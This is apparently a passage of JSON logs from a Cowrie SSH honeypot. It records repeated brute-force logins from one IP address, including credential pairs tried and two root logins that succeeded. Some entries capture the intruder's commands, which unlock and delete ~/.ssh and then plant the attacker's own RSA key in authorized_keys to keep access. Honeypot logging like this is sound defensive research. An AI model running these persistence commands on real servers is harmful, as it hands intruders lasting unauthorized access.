~","sensor":"my-vps","timestamp":"2025-09-08T22:01:01.085795Z","src_ip":"212.227.235.229","session":"8a431d2a4660"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:01:01.260199Z","src_ip":"212.227.235.229","session":"8a431d2a4660"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:01:01.261175Z","src_ip":"212.227.235.229","session":"8a431d2a4660"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33636,"dst_ip":"1.2.3.4","dst_port":22,"session":"295a17caee1c","protocol":"ssh","message":"New connection: 212.227.235.229:33636 (1.2.3.4:22) [session: 295a17caee1c]","sensor":"my-vps","timestamp":"2025-09-08T22:01:01.426327Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:01:01.427562Z","src_ip":"212.227.235.229","session":"295a17caee1c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:01:01.596207Z","src_ip":"212.227.235.229","session":"295a17caee1c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:01:02.317085Z","src_ip":"212.227.235.229","session":"295a17caee1c"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:01:03.488348Z","src_ip":"212.227.235.229","session":"295a17caee1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33642,"dst_ip":"1.2.3.4","dst_port":22,"session":"62cba7b199b1","protocol":"ssh","message":"New connection: 212.227.235.229:33642 (1.2.3.4:22) [session: 62cba7b199b1]","sensor":"my-vps","timestamp":"2025-09-08T22:01:03.680975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:01:03.681671Z","src_ip":"212.227.235.229","session":"62cba7b199b1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:01:03.862318Z","src_ip":"212.227.235.229","session":"62cba7b199b1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:01:04.622197Z","src_ip":"212.227.235.229","session":"62cba7b199b1"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:01:04.792784Z","src_ip":"212.227.235.229","session":"8a431d2a4660"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:01:04.804157Z","src_ip":"212.227.235.229","session":"62cba7b199b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42844,"dst_ip":"1.2.3.4","dst_port":22,"session":"d19d07b84bca","protocol":"ssh","message":"New connection: 212.227.235.229:42844 (1.2.3.4:22) [session: d19d07b84bca]","sensor":"my-vps","timestamp":"2025-09-08T22:01:09.531158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:01:09.531928Z","src_ip":"212.227.235.229","session":"d19d07b84bca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:01:09.826756Z","src_ip":"212.227.235.229","session":"d19d07b84bca"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T22:01:11.043483Z","src_ip":"212.227.235.229","session":"d19d07b84bca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58466,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ea39184b9d0","protocol":"ssh","message":"New connection: 212.227.235.229:58466 (1.2.3.4:22) [session: 0ea39184b9d0]","sensor":"my-vps","timestamp":"2025-09-08T22:01:12.266362Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:01:12.267780Z","src_ip":"212.227.235.229","session":"0ea39184b9d0"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:01:12.340162Z","src_ip":"212.227.235.229","session":"d19d07b84bca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:01:12.518070Z","src_ip":"212.227.235.229","session":"0ea39184b9d0"}
{"eventid":"cowrie.login.failed","username":"media","password":"123456","message":"login attempt [media/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T22:01:13.565307Z","src_ip":"212.227.235.229","session":"0ea39184b9d0"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:01:14.818471Z","src_ip":"212.227.235.229","session":"0ea39184b9d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34152,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3f4aa564dfe","protocol":"ssh","message":"New connection: 212.227.235.229:34152 (1.2.3.4:22) [session: c3f4aa564dfe]","sensor":"my-vps","timestamp":"2025-09-08T22:01:19.409627Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:01:19.410688Z","src_ip":"212.227.235.229","session":"c3f4aa564dfe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:01:19.741788Z","src_ip":"212.227.235.229","session":"c3f4aa564dfe"}
{"eventid":"cowrie.login.failed","username":"steam","password":"1234","message":"login attempt [steam/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T22:01:21.097918Z","src_ip":"212.227.235.229","session":"c3f4aa564dfe"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:01:22.429187Z","src_ip":"212.227.235.229","session":"c3f4aa564dfe"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:01:25.395108Z","src_ip":"212.227.235.229","session":"352528648a6f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42828,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a4fa3de462e","protocol":"ssh","message":"New connection: 212.227.235.229:42828 (1.2.3.4:22) [session: 8a4fa3de462e]","sensor":"my-vps","timestamp":"2025-09-08T22:01:29.741286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:01:29.741935Z","src_ip":"212.227.235.229","session":"8a4fa3de462e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:01:29.993822Z","src_ip":"212.227.235.229","session":"8a4fa3de462e"}
{"eventid":"cowrie.login.failed","username":"access","password":"password123","message":"login attempt [access/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:01:31.041588Z","src_ip":"212.227.235.229","session":"8a4fa3de462e"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:01:32.296094Z","src_ip":"212.227.235.229","session":"8a4fa3de462e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49558,"dst_ip":"1.2.3.4","dst_port":22,"session":"83baa6281f39","protocol":"ssh","message":"New connection: 212.227.235.229:49558 (1.2.3.4:22) [session: 83baa6281f39]","sensor":"my-vps","timestamp":"2025-09-08T22:01:34.081793Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53358,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac4f095a929d","protocol":"ssh","message":"New connection: 212.227.235.229:53358 (1.2.3.4:22) [session: ac4f095a929d]","sensor":"my-vps","timestamp":"2025-09-08T22:01:35.843435Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:01:35.932051Z","src_ip":"212.227.235.229","session":"ac4f095a929d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:01:36.156788Z","src_ip":"212.227.235.229","session":"ac4f095a929d"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty12!","message":"login attempt [root/Qwerty12!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:01:37.004103Z","src_ip":"212.227.235.229","session":"ac4f095a929d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:01:37.470215Z","src_ip":"212.227.235.229","session":"ac4f095a929d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:01:37.470947Z","src_ip":"212.227.235.229","session":"ac4f095a929d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:01:37.471815Z","src_ip":"212.227.235.229","session":"ac4f095a929d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:01:37.680389Z","src_ip":"212.227.235.229","session":"ac4f095a929d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:01:38.106762Z","src_ip":"212.227.235.229","session":"ac4f095a929d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:01:38.107519Z","src_ip":"212.227.235.229","session":"ac4f095a929d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:01:38.313322Z","src_ip":"212.227.235.229","session":"ac4f095a929d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:01:38.314307Z","src_ip":"212.227.235.229","session":"ac4f095a929d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57790,"dst_ip":"1.2.3.4","dst_port":22,"session":"2096d90f1fd1","protocol":"ssh","message":"New connection: 212.227.235.229:57790 (1.2.3.4:22) [session: 2096d90f1fd1]","sensor":"my-vps","timestamp":"2025-09-08T22:01:38.516409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:01:38.517319Z","src_ip":"212.227.235.229","session":"2096d90f1fd1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:01:38.720829Z","src_ip":"212.227.235.229","session":"2096d90f1fd1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:01:39.589583Z","src_ip":"212.227.235.229","session":"2096d90f1fd1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:01:40.202089Z","src_ip":"212.227.235.229","session":"83baa6281f39"}
